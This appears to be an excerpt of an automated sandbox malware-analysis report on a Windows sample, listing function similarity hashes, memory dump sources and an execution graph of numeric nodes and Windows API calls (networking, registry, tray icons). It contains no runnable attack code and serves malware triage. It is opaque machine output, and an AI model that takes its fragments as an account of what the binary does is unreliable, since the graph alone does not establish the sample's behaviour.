                                      Similarity
                                      • API ID: Heap$Free$Alloc
                                      • String ID:
                                      • API String ID: 3901518246-0
                                      • Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
                                      • Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
                                      • Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
                                      • Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740
                                      Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                      • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                      • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                      • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                      Function 0000000140017410 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      • Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
                                      • Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
                                      • Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
                                      • Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704
                                      Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 1298188129-0
                                      • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                      • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                      • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                      • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                      Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                      • String ID:
                                      • API String ID: 4254243056-0
                                      • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                      • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                      • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                      • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                      Execution Graph

                                      Execution Coverage:3.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:6.9%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:58
                                      execution_graph 85352 472ac7 85355 433493 WSAStartup 85352->85355 85354 472ad2 85356 433570 _wcscpy 85355->85356 85357 4334be gethostname gethostbyname 85355->85357 85356->85354 85357->85356 85358 4334e5 85357->85358 85359 433500 _wcscpy 85358->85359 85360 43351a _memmove 85358->85360 85361 43350b WSACleanup 85359->85361 85362 43352a inet_ntoa 85360->85362 85361->85354 85363 433544 _strcat 85362->85363 85367 43299a 85363->85367 85365 433552 _wcscpy ctype 85366 433561 WSACleanup 85365->85366 85366->85354 85368 4329d0 85367->85368 85369 4329a9 _strlen 85367->85369 85368->85365 85370 4329ba MultiByteToWideChar 85369->85370 85370->85368 85371 4329d6 85370->85371 85374 4115d7 85371->85374 85376 4115e1 _malloc 85374->85376 85377 4115fb MultiByteToWideChar 85376->85377 85380 4115fd std::exception::exception 85376->85380 85385 4135bb 85376->85385 85377->85365 85378 41163b 85400 4180af 46 API calls std::exception::operator= 85378->85400 85380->85378 85399 41130a 51 API calls __cinit 85380->85399 85381 411645 85401 418105 RaiseException 85381->85401 85384 411656 85386 413638 _malloc 85385->85386 85390 4135c9 _malloc 85385->85390 85407 417f77 46 API calls __getptd_noexit 85386->85407 85389 4135f7 RtlAllocateHeap 85389->85390 85398 413630 85389->85398 85390->85389 85392 413624 85390->85392 85393 4135d4 85390->85393 85396 413622 85390->85396 85405 417f77 46 API calls __getptd_noexit 85392->85405 85393->85390 85402 418901 46 API calls __NMSG_WRITE 85393->85402 85403 418752 46 API calls 8 library calls 85393->85403 85404 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 85393->85404 85406 417f77 46 API calls __getptd_noexit 85396->85406 85398->85376 85399->85378 85400->85381 85401->85384 85402->85393 85403->85393 85405->85396 85406->85398 85407->85398 85408 4010e0 85411 401100 85408->85411 85410 4010f8 85412 401113 85411->85412 85414 401120 85412->85414 85415 401184 85412->85415 85416 40114c 85412->85416 85442 401182 85412->85442 85413 40112c DefWindowProcW 85413->85410 85414->85413 85470 401000 Shell_NotifyIconW __cftof2_l 85414->85470 85449 401250 85415->85449 85418 401151 85416->85418 85419 40119d 85416->85419 85422 401219 85418->85422 85423 40115d 85418->85423 85420 4011a3 85419->85420 85421 42afb4 85419->85421 85420->85414 85430 4011b6 KillTimer 85420->85430 85431 4011db SetTimer RegisterWindowMessageW 85420->85431 85465 40f190 10 API calls 85421->85465 85422->85414 85427 401225 85422->85427 85426 401163 85423->85426 85432 42b01d 85423->85432 85433 42afe9 85426->85433 85434 40116c 85426->85434 85472 468b0e 74 API calls __cftof2_l 85427->85472 85428 401193 85428->85410 85429 42b04f 85471 40e0c0 74 API calls __cftof2_l 85429->85471 85464 401000 Shell_NotifyIconW __cftof2_l 85430->85464 85431->85428 85440 401204 CreatePopupMenu 85431->85440 85432->85413 85469 4370f4 52 API calls 85432->85469 85467 40f190 10 API calls 85433->85467 85434->85414 85435 401174 85434->85435 85466 45fd57 65 API calls __cftof2_l 85435->85466 85440->85410 85442->85413 85443 42afe4 85443->85428 85444 42b00e 85468 401a50 387 API calls 85444->85468 85445 4011c9 PostQuitMessage 85445->85410 85448 42afdc 85448->85413 85448->85443 85450 401262 __cftof2_l 85449->85450 85451 4012e8 85449->85451 85473 401b80 85450->85473 85451->85428 85453 4012d1 KillTimer SetTimer 85453->85451 85454 40128c 85454->85453 85455 4012bb 85454->85455 85456 4272ec 85454->85456 85457 4012c5 85455->85457 85458 42733f 85455->85458 85459 4272f4 Shell_NotifyIconW 85456->85459 85460 42731a Shell_NotifyIconW 85456->85460 85457->85453 85463 427393 Shell_NotifyIconW 85457->85463 85461 427348 Shell_NotifyIconW 85458->85461 85462 42736e Shell_NotifyIconW 85458->85462 85459->85453 85460->85453 85461->85453 85462->85453 85463->85453 85464->85445 85465->85428 85466->85448 85467->85444 85468->85442 85469->85442 85470->85429 85471->85442 85472->85443 85474 401b9c 85473->85474 85494 401c7e 85473->85494 85495 4013c0 52 API calls 85474->85495 85476 401bac 85477 42722b LoadStringW 85476->85477 85478 401bb9 85476->85478 85480 427246 85477->85480 85496 402160 85478->85496 85510 40e0a0 85480->85510 85481 401bcd 85482 427258 85481->85482 85483 401bda 85481->85483 85514 40d200 52 API calls 2 library calls 85482->85514 85483->85480 85485 401be4 85483->85485 85509 40d200 52 API calls 2 library calls 85485->85509 85488 427267 85489 42727b 85488->85489 85490 401bf3 _wcscpy __cftof2_l _wcsncpy 85488->85490 85515 40d200 52 API calls 2 library calls 85489->85515 85493 401c62 Shell_NotifyIconW 85490->85493 85492 427289 85493->85494 85494->85454 85495->85476 85497 426daa 85496->85497 85498 40216b _wcslen 85496->85498 85523 40c600 85497->85523 85501 402180 85498->85501 85502 40219e 85498->85502 85500 426db5 85500->85481 85516 403bd0 85501->85516 85522 4013a0 52 API calls 85502->85522 85505 402187 _memmove 85505->85481 85506 4021a5 85507 426db7 85506->85507 85508 4115d7 52 API calls 85506->85508 85508->85505 85509->85490 85511 40e0b2 85510->85511 85512 40e0a8 85510->85512 85511->85490 85536 403c30 52 API calls _memmove 85512->85536 85514->85488 85515->85492 85517 403bd8 85516->85517 85518 403bd9 ctype 85516->85518 85517->85505 85519 4268b9 85518->85519 85520 4115d7 52 API calls 85518->85520 85521 403c18 85520->85521 85521->85505 85522->85506 85524 40c619 85523->85524 85525 40c60a 85523->85525 85524->85500 85525->85524 85528 4026f0 85525->85528 85527 426d7a _memmove 85527->85500 85529 426873 85528->85529 85530 4026ff 85528->85530 85535 4013a0 52 API calls 85529->85535 85530->85527 85532 42687b 85533 4115d7 52 API calls 85532->85533 85534 42689e _memmove 85533->85534 85534->85527 85535->85532 85536->85511 85537 42d142 85541 480a8d 85537->85541 85539 42d14f 85540 480a8d 387 API calls 85539->85540 85540->85539 85542 480ae4 85541->85542 85543 480b26 85541->85543 85544 480aeb 85542->85544 85545 480b15 85542->85545 85572 40bc70 85543->85572 85547 480aee 85544->85547 85548 480b04 85544->85548 85579 4805bf 387 API calls 85545->85579 85547->85543 85550 480af3 85547->85550 85578 47fea2 387 API calls __itow_s 85548->85578 85577 47f135 387 API calls 85550->85577 85553 40e0a0 52 API calls 85570 480b2e 85553->85570 85556 480aff 85594 408f40 85556->85594 85557 481156 85558 408f40 VariantClear 85557->85558 85559 48115e 85558->85559 85559->85539 85560 480ff5 85593 45e737 90 API calls 3 library calls 85560->85593 85563 40c2c0 52 API calls 85563->85570 85564 408e80 VariantClear 85564->85570 85565 40e710 53 API calls 85565->85570 85566 40a780 387 API calls 85566->85570 85570->85553 85570->85556 85570->85560 85570->85563 85570->85564 85570->85565 85570->85566 85580 401980 85570->85580 85588 45377f 52 API calls 85570->85588 85589 45e951 53 API calls 85570->85589 85590 40e830 53 API calls 85570->85590 85591 47925f 53 API calls 85570->85591 85592 47fcff 387 API calls 85570->85592 85573 4115d7 52 API calls 85572->85573 85574 40bc98 85573->85574 85575 4115d7 52 API calls 85574->85575 85576 40bca6 85575->85576 85576->85570 85577->85556 85578->85556 85579->85556 85581 4019a3 85580->85581 85587 401985 85580->85587 85582 4019b8 85581->85582 85581->85587 85583 403e10 53 API calls 85582->85583 85586 4019c4 85583->85586 85584 40199f 85584->85570 85586->85570 85587->85584 85598 403e10 85587->85598 85588->85570 85589->85570 85590->85570 85591->85570 85592->85570 85593->85556 85596 408f48 ctype 85594->85596 85595 4265c7 VariantClear 85597 408f55 ctype 85595->85597 85596->85595 85596->85597 85597->85557 85615 403ea0 52 API calls __cinit 85598->85615 85600 403e25 85602 4115d7 52 API calls 85600->85602 85601 403e1d 85601->85600 85603 428987 85601->85603 85604 403e34 85602->85604 85618 408e80 VariantClear 85603->85618 85606 403e44 85604->85606 85608 40bc70 52 API calls 85604->85608 85609 403e51 85606->85609 85616 403c30 52 API calls _memmove 85606->85616 85607 428993 85607->85584 85608->85606 85611 4115d7 52 API calls 85609->85611 85612 403e5e 85611->85612 85617 403da0 52 API calls 85612->85617 85614 403e82 85614->85584 85615->85601 85616->85609 85617->85614 85618->85607 85619 425ba2 85624 40e360 85619->85624 85621 425bb4 85640 41130a 51 API calls __cinit 85621->85640 85623 425bbe 85625 4115d7 52 API calls 85624->85625 85626 40e3ec GetModuleFileNameW 85625->85626 85641 413a0e 85626->85641 85628 40e421 _wcsncat 85644 413a9e 85628->85644 85631 4115d7 52 API calls 85632 40e45e _wcscpy 85631->85632 85633 40bc70 52 API calls 85632->85633 85634 40e498 85633->85634 85647 40e4c0 85634->85647 85636 40e4a9 85636->85621 85637 401c90 52 API calls 85639 40e4a1 _wcscat _wcslen _wcsncpy 85637->85639 85638 4115d7 52 API calls 85638->85639 85639->85636 85639->85637 85639->85638 85640->85623 85661 413801 85641->85661 85691 419efd 85644->85691 85703 403350 85647->85703 85649 40e4cb RegOpenKeyExW 85650 427190 RegQueryValueExW 85649->85650 85651 40e4eb 85649->85651 85652 4271b0 85650->85652 85653 42721a RegCloseKey 85650->85653 85651->85639 85654 4115d7 52 API calls 85652->85654 85653->85639 85655 4271cb 85654->85655 85710 43652f 52 API calls 85655->85710 85657 4271d8 RegQueryValueExW 85658 4271f7 85657->85658 85660 42720e 85657->85660 85659 402160 52 API calls 85658->85659 85659->85660 85660->85653 85662 41389e 85661->85662 85668 41381a 85661->85668 85663 4139e8 85662->85663 85665 413a00 85662->85665 85688 417f77 46 API calls __getptd_noexit 85663->85688 85690 417f77 46 API calls __getptd_noexit 85665->85690 85666 4139ed 85689 417f25 10 API calls ___strgtold12_l 85666->85689 85668->85662 85677 41388a 85668->85677 85683 419e30 46 API calls ___strgtold12_l 85668->85683 85670 413967 85670->85628 85671 413909 85673 41396c 85671->85673 85674 413929 85671->85674 85673->85662 85673->85670 85675 41397a 85673->85675 85674->85662 85676 413945 85674->85676 85685 419e30 46 API calls ___strgtold12_l 85674->85685 85687 419e30 46 API calls ___strgtold12_l 85675->85687 85676->85662 85676->85670 85680 41395b 85676->85680 85677->85662 85677->85671 85684 419e30 46 API calls ___strgtold12_l 85677->85684 85686 419e30 46 API calls ___strgtold12_l 85680->85686 85683->85677 85684->85671 85685->85676 85686->85670 85687->85670 85688->85666 85689->85670 85690->85670 85692 419f13 85691->85692 85693 419f0e 85691->85693 85700 417f77 46 API calls __getptd_noexit 85692->85700 85693->85692 85694 419f2b 85693->85694 85698 40e454 85694->85698 85702 417f77 46 API calls __getptd_noexit 85694->85702 85698->85631 85699 419f18 85701 417f25 10 API calls ___strgtold12_l 85699->85701 85700->85699 85701->85698 85702->85699 85704 403367 85703->85704 85705 403358 85703->85705 85706 4115d7 52 API calls 85704->85706 85705->85649 85707 403370 85706->85707 85708 4115d7 52 API calls 85707->85708 85709 40339e 85708->85709 85709->85649 85710->85657 85711 4725e1 SHGetFolderPathW 85712 42b14b 85719 40bc10 85712->85719 85714 42b159 85730 4096a0 85714->85730 85716 42b177 85857 44b92d VariantClear 85716->85857 85718 42bc5b 85720 40bc24 85719->85720 85721 40bc17 85719->85721 85723 40bc2a 85720->85723 85724 40bc3c 85720->85724 85858 408e80 VariantClear 85721->85858 85859 408e80 VariantClear 85723->85859 85727 4115d7 52 API calls 85724->85727 85725 40bc1f 85725->85714 85729 40bc43 85727->85729 85728 40bc33 85728->85714 85729->85714 85731 4096c6 _wcslen 85730->85731 85732 4115d7 52 API calls 85731->85732 85793 40a70c ctype _memmove 85731->85793 85733 4096fa _memmove 85732->85733 85734 4115d7 52 API calls 85733->85734 85736 40971b 85734->85736 85739 409749 CharUpperBuffW 85736->85739 85741 40976a ctype 85736->85741 85736->85793 85737 4297aa 85738 4115d7 52 API calls 85737->85738 85781 4297d1 _memmove 85738->85781 85739->85741 85789 4097e5 ctype 85741->85789 85978 47dcbb 387 API calls 85741->85978 85743 408f40 VariantClear 85744 42ae92 85743->85744 86026 410c60 VariantClear ctype 85744->86026 85746 42aea4 85747 409aa2 85749 4115d7 52 API calls 85747->85749 85753 409afe 85747->85753 85747->85781 85748 40a689 85750 4115d7 52 API calls 85748->85750 85749->85753 85772 40a6af ctype _memmove 85750->85772 85751 409b2a 85755 429dbe 85751->85755 85758 40b400 2 API calls 85751->85758 85818 409b4d ctype _memmove 85751->85818 85753->85751 85754 4115d7 52 API calls 85753->85754 85756 429d31 85754->85756 85760 429dd3 85755->85760 85765 40b400 2 API calls 85755->85765 85759 429d42 85756->85759 86006 44a801 52 API calls 85756->86006 85757 409fd2 85763 40a045 85757->85763 85821 42a3f5 85757->85821 85758->85755 85770 40e0a0 52 API calls 85759->85770 85760->85818 86009 40e1c0 VariantClear ctype 85760->86009 85761 429a46 VariantClear 85761->85789 85767 4115d7 52 API calls 85763->85767 85764 408f40 VariantClear 85764->85789 85765->85760 85774 40a04c 85767->85774 85769 4115d7 52 API calls 85769->85789 85775 429d57 85770->85775 85773 4115d7 52 API calls 85772->85773 85773->85793 85779 40a0a7 85774->85779 85860 4091e0 85774->85860 86007 453443 52 API calls 85775->86007 85777 42a42f 86013 45e737 90 API calls 3 library calls 85777->86013 85802 40a0af 85779->85802 86014 40c790 VariantClear ctype 85779->86014 85780 4299d9 85784 408f40 VariantClear 85780->85784 86025 45e737 90 API calls 3 library calls 85781->86025 85788 4299e2 85784->85788 85785 429abd 85785->85716 85786 429d88 86008 453443 52 API calls 85786->86008 85787 403e10 53 API calls 85787->85818 85998 410c60 VariantClear ctype 85788->85998 85789->85747 85789->85748 85789->85761 85789->85764 85789->85769 85789->85772 85789->85780 85789->85781 85789->85785 85797 42a452 85789->85797 85936 40a780 85789->85936 85979 40c2c0 85789->85979 85997 40c4e0 387 API calls 85789->85997 85999 40ba10 85789->85999 86005 40e270 VariantClear ctype 85789->86005 85977 4013a0 52 API calls 85793->85977 85796 402780 52 API calls 85796->85818 85797->85743 85798 44a801 52 API calls 85798->85818 85800 40a650 ctype 85800->85716 85801 408f40 VariantClear 85822 40a162 ctype _memmove 85801->85822 85803 40a11b 85802->85803 85804 42a4b4 VariantClear 85802->85804 85802->85822 85810 40a12d ctype 85803->85810 86015 40e270 VariantClear ctype 85803->86015 85804->85810 85805 40a780 373 API calls 85805->85818 85808 401980 53 API calls 85808->85818 85809 4115d7 52 API calls 85809->85822 85810->85809 85810->85822 85813 42a74d VariantClear 85813->85822 85814 41130a 51 API calls __cinit 85814->85818 85815 4115d7 52 API calls 85815->85818 85816 409c95 85816->85716 85817 40e270 VariantClear 85817->85822 85818->85757 85818->85777 85818->85787 85818->85793 85818->85796 85818->85798 85818->85805 85818->85808 85818->85814 85818->85815 85818->85816 85818->85821 86010 45f508 52 API calls 85818->86010 86011 408e80 VariantClear 85818->86011 85819 40a368 85820 42aad4 85819->85820 85823 40a397 85819->85823 86019 46fe90 VariantClear VariantClear ctype 85820->86019 86012 47390f VariantClear 85821->86012 85822->85801 85822->85813 85822->85817 85822->85819 85822->85820 85824 42a886 VariantClear 85822->85824 85825 42a7e4 VariantClear 85822->85825 85830 4115d7 52 API calls 85822->85830 85832 4115d7 52 API calls 85822->85832 86016 470870 52 API calls 85822->86016 86017 408e80 VariantClear 85822->86017 86018 44ccf1 VariantClear ctype 85822->86018 85827 40a3ce 85823->85827 85828 40b400 2 API calls 85823->85828 85851 40a42c ctype 85823->85851 85824->85822 85825->85822 85836 40a3d9 ctype 85827->85836 85926 40b400 85827->85926 85828->85827 85830->85822 85831 42abaf 85834 42abd4 VariantClear 85831->85834 85842 40a4ee ctype 85831->85842 85835 42a5a6 VariantInit VariantCopy 85832->85835 85833 40a4dc 85833->85842 86021 40e270 VariantClear ctype 85833->86021 85834->85842 85835->85822 85838 42a5c6 VariantClear 85835->85838 85837 40a41a 85836->85837 85844 42ab44 VariantClear 85836->85844 85836->85851 85837->85851 86020 40e270 VariantClear ctype 85837->86020 85838->85822 85839 42ac4f 85845 42ac79 VariantClear 85839->85845 85849 40a546 ctype 85839->85849 85842->85839 85843 40a534 85842->85843 85843->85849 86022 40e270 VariantClear ctype 85843->86022 85844->85851 85845->85849 85846 42ad28 85852 42ad4e VariantClear 85846->85852 85856 40a583 ctype 85846->85856 85849->85846 85850 40a571 85849->85850 85850->85856 86023 40e270 VariantClear ctype 85850->86023 85851->85831 85851->85833 85852->85856 85854 42ae0e VariantClear 85854->85856 85856->85800 85856->85854 86024 40e270 VariantClear ctype 85856->86024 85857->85718 85858->85725 85859->85728 85861 409202 85860->85861 85862 42d7ad 85860->85862 85919 409216 ctype 85861->85919 86171 410940 387 API calls 85861->86171 86174 45e737 90 API calls 3 library calls 85862->86174 85865 409386 85866 40939c 85865->85866 86172 40f190 10 API calls 85865->86172 85866->85779 85868 4095b2 85868->85866 85870 4095bf 85868->85870 85869 409253 PeekMessageW 85869->85919 86173 401a50 387 API calls 85870->86173 85872 40d410 VariantClear 85872->85919 85873 42d8cd Sleep 85873->85919 85874 4095c6 LockWindowUpdate DestroyWindow GetMessageW 85874->85866 85877 4095f9 85874->85877 85876 42e13b 86199 40d410 VariantClear 85876->86199 85880 42e158 TranslateMessage DispatchMessageW GetMessageW 85877->85880 85880->85880 85881 42e188 85880->85881 85881->85866 85883 409567 PeekMessageW 85883->85919 85885 44c29d 52 API calls 85925 42da45 85885->85925 85886 46f3c1 107 API calls 85886->85919 85887 40e0a0 52 API calls 85887->85919 85888 46fdbf 108 API calls 85888->85925 85889 42dcd2 WaitForSingleObject 85894 42dcf0 GetExitCodeProcess CloseHandle 85889->85894 85889->85919 85890 409551 TranslateMessage DispatchMessageW 85890->85883 85892 42dd3d Sleep 85892->85925 85893 47d33e 365 API calls 85893->85919 86180 40d410 VariantClear 85894->86180 85896 4094cf Sleep 85896->85919 85899 408f40 VariantClear 85899->85925 85901 42d94d timeGetTime 86176 465124 53 API calls 85901->86176 85903 40c620 timeGetTime 85903->85919 85906 465124 53 API calls 85906->85925 85907 42dd89 CloseHandle 85907->85925 85909 42de19 GetExitCodeProcess CloseHandle 85909->85925 85912 42de88 Sleep 85912->85919 85914 4096a0 365 API calls 85914->85919 85917 42e0cc VariantClear 85917->85919 85918 408f40 VariantClear 85918->85919 85919->85865 85919->85869 85919->85872 85919->85873 85919->85876 85919->85883 85919->85886 85919->85887 85919->85889 85919->85890 85919->85892 85919->85893 85919->85896 85919->85901 85919->85903 85919->85914 85919->85917 85919->85918 85921 45e737 90 API calls 85919->85921 85919->85925 86027 4091b0 85919->86027 86085 40afa0 85919->86085 86111 408fc0 85919->86111 86146 408cc0 85919->86146 86160 40d150 85919->86160 86165 40d170 85919->86165 86175 465124 53 API calls 85919->86175 86198 40e270 VariantClear ctype 85919->86198 85920 401b10 52 API calls 85920->85925 85921->85919 85923 401980 53 API calls 85923->85925 85925->85885 85925->85888 85925->85899 85925->85906 85925->85907 85925->85909 85925->85912 85925->85919 85925->85920 85925->85923 86177 45178a 54 API calls 85925->86177 86178 47d33e 387 API calls 85925->86178 86179 453bc6 54 API calls 85925->86179 86181 40c620 timeGetTime 85925->86181 86182 40d410 VariantClear 85925->86182 86183 443d19 85925->86183 86191 4574b4 VariantClear 85925->86191 86192 403cd0 85925->86192 86196 4731e1 VariantClear 85925->86196 86197 4331a2 6 API calls 85925->86197 85927 40b40f 85926->85927 85935 40b45e ctype 85926->85935 85928 40b41f 85927->85928 85929 40b400 VariantClear 85927->85929 85930 40b400 VariantClear 85928->85930 85933 40b42a ctype 85928->85933 85929->85928 85930->85933 85931 40b44c 85931->85935 87361 40e270 VariantClear ctype 85931->87361 85932 42839c VariantClear 85932->85935 85933->85931 85933->85932 85933->85935 85935->85836 85937 40a7a6 85936->85937 85938 40ae8c 85936->85938 85939 4115d7 52 API calls 85937->85939 87362 41130a 51 API calls __cinit 85938->87362 85948 40a7c6 ctype _memmove 85939->85948 85941 40a86d 85943 40abd1 85941->85943 85945 40a878 ctype 85941->85945 85942 408e80 VariantClear 85942->85948 87367 45e737 90 API calls 3 library calls 85943->87367 85950 408f40 VariantClear 85945->85950 85956 40a884 ctype 85945->85956 85946 401b10 52 API calls 85946->85948 85947 42b791 VariantClear 85947->85948 85948->85941 85948->85942 85948->85943 85948->85946 85948->85947 85949 40bc10 53 API calls 85948->85949 85951 42ba2d VariantClear 85948->85951 85952 42b459 VariantClear 85948->85952 85953 4115d7 52 API calls 85948->85953 85954 408cc0 380 API calls 85948->85954 85957 42b6f6 VariantClear 85948->85957 85958 40e270 VariantClear 85948->85958 85960 42bbf5 85948->85960 85961 4115d7 52 API calls 85948->85961 85962 40b5f0 89 API calls 85948->85962 85966 42bb6a 85948->85966 85967 408f40 VariantClear 85948->85967 85971 42bc37 85948->85971 85976 4530c9 VariantClear 85948->85976 87363 45308a 53 API calls 85948->87363 87364 470870 52 API calls 85948->87364 87365 457f66 87 API calls __write_nolock 85948->87365 87366 472f47 127 API calls 85948->87366 85949->85948 85950->85945 85951->85948 85952->85948 85953->85948 85954->85948 85956->85789 85957->85948 85958->85948 85959 42bc5b 85959->85789 87368 45e737 90 API calls 3 library calls 85960->87368 85964 42b5b3 VariantInit VariantCopy 85961->85964 85962->85948 85964->85948 85968 42b5d7 VariantClear 85964->85968 87370 44b92d VariantClear 85966->87370 85967->85948 85968->85948 87369 45e737 90 API calls 3 library calls 85971->87369 85974 42bc48 85974->85966 85975 408f40 VariantClear 85974->85975 85975->85966 85976->85948 85977->85737 85978->85741 85980 40c2c7 85979->85980 85981 40c30e 85979->85981 85984 40c2d3 85980->85984 85985 426c79 85980->85985 85982 40c315 85981->85982 85983 426c2b 85981->85983 85986 40c321 85982->85986 85987 426c5a 85982->85987 85989 426c4b 85983->85989 85990 426c2e 85983->85990 87371 403ea0 52 API calls __cinit 85984->87371 87376 4534e3 52 API calls 85985->87376 87372 403ea0 52 API calls __cinit 85986->87372 87375 4534e3 52 API calls 85987->87375 87374 4534e3 52 API calls 85989->87374 85996 40c2de 85990->85996 87373 4534e3 52 API calls 85990->87373 85996->85789 85997->85789 85998->85800 86000 40ba49 85999->86000 86004 40ba1b ctype _memmove 85999->86004 86002 4115d7 52 API calls 86000->86002 86001 4115d7 52 API calls 86003 40ba22 86001->86003 86002->86004 86003->85789 86004->86001 86005->85789 86006->85759 86007->85786 86008->85751 86009->85818 86010->85818 86011->85818 86012->85777 86013->85797 86014->85779 86015->85810 86016->85822 86017->85822 86018->85822 86019->85827 86020->85851 86021->85842 86022->85849 86023->85856 86024->85856 86025->85797 86026->85746 86028 42c5fe 86027->86028 86042 4091c6 86027->86042 86029 40bc70 52 API calls 86028->86029 86028->86042 86030 42c64e InterlockedIncrement 86029->86030 86031 42c665 86030->86031 86035 42c697 86030->86035 86034 42c672 InterlockedDecrement Sleep InterlockedIncrement 86031->86034 86031->86035 86032 42c737 InterlockedDecrement 86033 42c74a 86032->86033 86036 408f40 VariantClear 86033->86036 86034->86031 86034->86035 86035->86032 86057 42c731 86035->86057 86200 408e80 VariantClear 86035->86200 86038 42c752 86036->86038 86214 410c60 VariantClear ctype 86038->86214 86039 42c6cf 86201 45340c 86039->86201 86042->85919 86043 42c6db 86044 402160 52 API calls 86043->86044 86045 42c6e5 86044->86045 86046 45340c 85 API calls 86045->86046 86047 42c6f1 86046->86047 86207 40d200 52 API calls 2 library calls 86047->86207 86049 42c6fb 86208 465124 53 API calls 86049->86208 86051 42c715 86052 42c76a 86051->86052 86053 42c719 86051->86053 86215 401b10 86052->86215 86209 46fe32 86053->86209 86056 42c77e 86058 401980 53 